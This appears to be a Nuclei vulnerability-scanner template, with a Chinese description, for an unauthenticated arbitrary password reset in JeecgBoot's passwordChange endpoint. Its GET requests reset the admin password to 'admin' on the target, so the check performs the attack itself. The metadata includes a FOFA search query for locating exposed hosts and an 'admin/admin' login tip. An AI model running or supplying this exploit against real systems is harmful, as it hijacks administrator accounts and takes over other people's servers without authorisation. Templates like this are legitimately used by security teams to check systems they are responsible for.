id: jeecgboot-passwordChange-resetpassword
info:
  name: JeecgBoot passwordChange - 任意用户密码重置
  author: leadlife
  severity: high
  description: JeecgBoot系统接口passwordChange任意用户密码重置漏洞，未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
  reference: 
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3passwordChange%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md
    - https://github.com/zan8in/afrog/blob/afc4b21468b346fc2e43ca88595a365ff0f4ac15/pocs/afrog-pocs/vulnerability/jeecgboot-passwordchange-user-reset-unauth.yaml#L20
  metadata:
    verified: true
    fofa-query: body="/sys/common/pdf/pdfPreviewIframe"
    hunter-query: demo
    tips: admin/admin
    repair:
    version:
  tags: jeecgboot,resetpassword,jeecg

http:
  - method: GET
    path:
      - "{{BaseURL}}/sys/user/passwordChange?username=admin&password=admin&smscode=&phone="
      - "{{BaseURL}}/jeecg-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone="
      - "{{BaseURL}}/novat-boot/sys/user/passwordChange?username=admin1&password=admin&smscode=&phone="

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'success','message')
        condition: and